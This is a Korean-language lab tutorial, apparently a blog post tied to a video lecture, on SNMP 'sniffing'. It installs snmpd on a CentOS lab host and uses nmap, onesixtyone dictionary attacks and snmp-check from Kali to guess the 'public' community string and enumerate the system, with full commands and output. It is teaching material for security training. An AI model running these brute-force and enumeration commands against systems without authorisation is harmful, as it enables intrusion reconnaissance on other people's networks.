공격툴&정보수집 - 12. SNMP Sniffing 공격

공격툴&정보수집 - 12. SNMP Sniffing 공격

 

 

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.

 

 

@ CentOS

 

 - SNMP 패키지 설치 및 활성화

 

[root@CentOS /root]# yum -y install net-snmp net-snmp-libs net-snmp-utils

[root@CentOS /root]# service snmpd start
Starting snmpd:                                            [  OK  ]
[root@CentOS /root]# 
[root@CentOS /root]# chkconfig snmpd on
[root@CentOS /root]# chkconfig --list snmpd
snmpd           0:off   1:off   2:on    3:on    4:on    5:on    6:off

 

 

@ Kali Linux

 

 - namp을 이용하여 CentOS에 대해서 SNMP 서비스 포트를 스켄한다.

 

root@kali:~# nmap -sU -p 161 192.168.20.200

 

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-05-25 17:09 KST
Nmap scan report for 192.168.20.200
Host is up (0.00059s latency).
PORT    STATE SERVICE
161/udp open  snmp
MAC Address: 00:0C:29:72:28:7C (VMware)

 

Nmap done: 1 IP address (1 host up) scanned in 0.65 seconds

 

 

 -  와이어샤크 실행 및 캡처 실시 (Capture -> Interfaces -> eth1 start 클릭)

 

root@kali:~# wireshark &

 

 

 - CentOS을 대상으로 Dictionary 공격 실시(툴 : onesixtyone)

 

root@kali:~# onesixtyone
onesixtyone 0.3.2 [options] <host> <community>
  -c <communityfile> file with community names to try
  -i <inputfile>     file with target hosts
  -o <outputfile>    output log
  -d                 debug mode, use twice for more information

  -w n               wait n milliseconds (1/1000 of a second) between sending packets (default 10)
  -q                 quiet mode, do not print log to stdout, use with -l
examples: ./s -c dict.txt 192.168.4.1 public
          ./s -c dict.txt -i hosts -o my.log -w 100

 

 

 - 'dict.txt' 파일 확인

 

root@kali:~# cd /usr/share/doc/onesixtyone/
root@kali:/usr/share/doc/onesixtyone#
root@kali:/usr/share/doc/onesixtyone# ls
README  changelog.Debian.gz  changelog.gz  copyright  dict.txt

root@kali:/usr/share/doc/onesixtyone# cat dict.txt
~ 중간 생략 ~

 

 

root@kali:/usr/share/doc/onesixtyone# egrep '(public|private)' dict.txt
private
public

 

 

 - CentOS을 대상으로 SNMP 스니핑 실시

 

root@kali:/usr/share/doc/onesixtyone# onesixtyone -c dict.txt 192.168.20.200
Scanning 1 hosts, 49 communities
192.168.20.200 [public] Linux CentOS 2.6.18-371.el5 #1 SMP Tue Oct 1 08:35:08 EDT 2013 x86_64

 

 

root@kali:/usr/share/doc/onesixtyone# cd
root@kali:~#

 

 

 - 와이어샤크 캡처 내용 확인 및 캡처 중지
 

 

 

 

 - 'snmpcheck' 다운로드 실시

root@kali:~#cd /test
root@kali:/test# git clone git://git.kali.org/packages/snmpcheck.git

 

 

root@kali:/test# ls
VMwareTools-9.6.1-1378637.tar.gz  snmpcheck                 vmware-tools-upgrader-64
manifest.txt                      vmware-tools-distrib
run_upgrader.sh                   vmware-tools-upgrader-32

 

 

root@kali:/test# snmp-check

snmpcheck v1.8 - SNMP enumerator

Copyright (c) 2005-2011 by Matteo Cantoni (www.nothink.org)

 

 Usage snmpcheck -t <IP address>

 

           -t : target host;

 

           -p : SNMP port; default port is 161;

           -c : SNMP community; default is public;

           -v : SNMP version (1,2); default is 1;

           -r : request retries; default is 0;

 

           -w : detect write access (separate action by enumeration);

 

           -d : disable 'TCP connections' enumeration!

           -T : force timeout in seconds; default is 20. Max is 60;

           -D : enable debug;

           -h : show help menu; 

 

 

 - CentOS을 대상으로 SNMP 스니핑 실시 (툴 : snmpcheck)

 

root@kali:/test# snmp-check -t 192.168.20.200 -c public -p 161
snmpcheck.pl v1.8 - SNMP enumerator
Copyright (c) 2005-2011 by Matteo Cantoni (www.nothink.org)

 

 [*] Try to connect to 192.168.20.200
 [*] Connected to 192.168.20.200
 [*] Starting enumeration at 2016-05-25 17:39:58

 

 [*] System information
 -----------------------------------------------------------------------------------------------

 

 Hostname               : CentOS

 Description            : Linux CentOS 2.6.18-371.el5 #1 SMP Tue Oct 1 08:35:08 EDT 2013 x86_64
 Uptime system          : 4 hours, 01:52.06
 Uptime SNMP daemon     : 31 minutes, 38.22
 Contact                : Root <root@localhost> (configure /etc/snmp/snmp.local.conf)
 Location               : Unknown (edit /etc/snmp/snmpd.conf)

 Motd                   : -

 [*] Network information
 -----------------------------------------------------------------------------------------------

 

 IP forwarding enabled   : -
 Default TTL             : -
 TCP segments received   : -
 TCP segments sent       : -
 TCP segments retrans.   : -
 Input datagrams         : -
 Delivered datagrams     : -
 Output datagrams        : -

 

 [*] Enumerated 192.168.20.200 in 0.10 seconds
Signal USR1 received in thread 1, but no signal handler set. at ./snmpcheck-1.8.pl line 230.

 

 

[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)

공격툴&정보수집 - 제12장 SNMP Sniffing 공격  https://youtu.be/d8F04c-u0FU